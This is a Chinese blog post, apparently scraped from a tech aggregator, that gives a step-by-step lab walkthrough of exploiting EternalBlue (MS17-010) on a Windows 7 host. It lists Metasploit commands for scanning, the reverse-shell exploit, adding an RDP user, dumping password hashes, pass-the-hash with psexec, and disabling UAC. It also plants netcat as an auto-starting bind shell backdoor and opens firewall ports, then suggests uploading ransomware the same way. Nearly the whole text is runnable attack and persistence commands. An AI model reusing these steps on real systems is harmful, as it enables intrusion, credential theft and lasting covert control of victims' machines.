zoukankan      html  css  js  c++  java
  • 永恒之蓝漏洞复现及留下隐藏后门nc及关闭主机防护开启后门

    题记

            近期我打算把我脑子里面想了很久的需要实战的东西都完成一遍,所以频率会非常高,活到老,学到老。时间是检验真理的唯一标准。

    环境

            机器:kali(192.168.0.119)、win7(192.168.0.126)

            Ctrl+shift+t在kali打开2个窗口。

    一、探测目标是否存在此漏洞

    1、使用探测模块探测。

            use auxiliary/scanner/smb/smb_ms17_010

            set RHOSTS 192.168.0.126

            exploit

            可以看到目标主机存在此漏洞。

    二、漏洞利用

    1、使用攻击模块

    use exploit/windows/smb/ms17_010_eternalblue

    Show options

    2、瞄准目标

            set RHOSTS 192.168.0.126

            set payload windows/x64/meterpreter/reverse_tcp

            show options

    3、进行攻击并拿下

    set lhost 192.168.0.119

    exploit

    三、权限连接后留后门

    1、创建一个新用户来远程连接win7桌面。

            run post/windows/manage/enable_rdp

            run post/windows/manage/enable_rdp username=goddess password=123.com

    2、kali终端连接目标

            rdesktop 192.168.0.126

            然后就能用其他用户登录了。

    3、关闭主机防护开启后门

            Windows密码存放处:C:WindowsSystem32configSAM

            Linux密码存放处:vim /etc/shadow

    3.1Hashdump获取密码密文

            goddess:1003:aad3b435b51404eeaad3b435b51404ee:afffeba176210fad4628f0524bfe1942:::

    3.2创建防火墙规则

            Shell

            netsh firewall add portopening TCP 4444 "goddess" enable all

            exit退出

            background把权限放到后台

    3.3使用hash值登录系统(遇到不会的就开show options看缺什么)

            use exploit/windows/smb/psexec

            set payload windows/meterpreter/reverse_tcp

            set rhosts 192.168.0.126

            set lhost 192.168.0.119

            set SMBUser goddess

            set SMBPass aad3b435b51404eeaad3b435b51404ee:afffeba176210fad4628f0524bfe1942

            set SMBDomain WORKGROUP

            exploit

    4、meterpreter > getuid

    5、下面我们配置一个后门程序,修改 UAC 的注册表,需要重启才能生效。

            Shell

            C:WindowsSystem32>cmd.exe /k %windir%System32 eg.exe ADD HKLMSOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem /v EnableLUA /t REG_DWORD /d 0 /f

            重启前留个后门。

            upload /usr/share/windows-binaries/nc.exe C:\windows\system32

            reg setval -k HKLM\software\microsoft\windows\currentversion\run -v lltest_nc -d 'C:windowssystem32 c.exe -Ldp 443 -e cmd.exe' 开机自启,监听端口为443

            shell

            防火墙允许 443 端口访问网络否则开机的时需要用户点击允许访问网络才可以成功执行。

            C:Windowssystem32> netsh firewall add portopening TCP 443 "goddess" ENABLE ALL 重启

            shutdown -r -f -t 0

            重启后用户登录可以看到443开启了

            Kali使用nc监听:nc -v 192.168.0.126 443

            或者

    6、扩展

            可以像传nc一样上传勒索病毒。

  • 相关阅读:
    用C++发邮件
    python打包程序py2exe实战
    分享:Python: 数据分析资源
    Socket传输文件时进行校验(简单解决TCP粘包问题)
    第二回 基类的架造方法应该为子类想的多一些
    第一回 要想知道为什么抽象出基类,应该先对基类有一个比较明确的认识
    树型结构~无限级联下拉列表框
    为什么我要将数据库上下文进行抽象,为它生产一个基类有用吗~目录
    将不确定变为确定~真的是SqlDataReader引起的超时?
    张学友 《她来听我的演唱会》
  • 原文地址:https://www.cnblogs.com/sunny11/p/14082618.html
Copyright © 2011-2022 走看看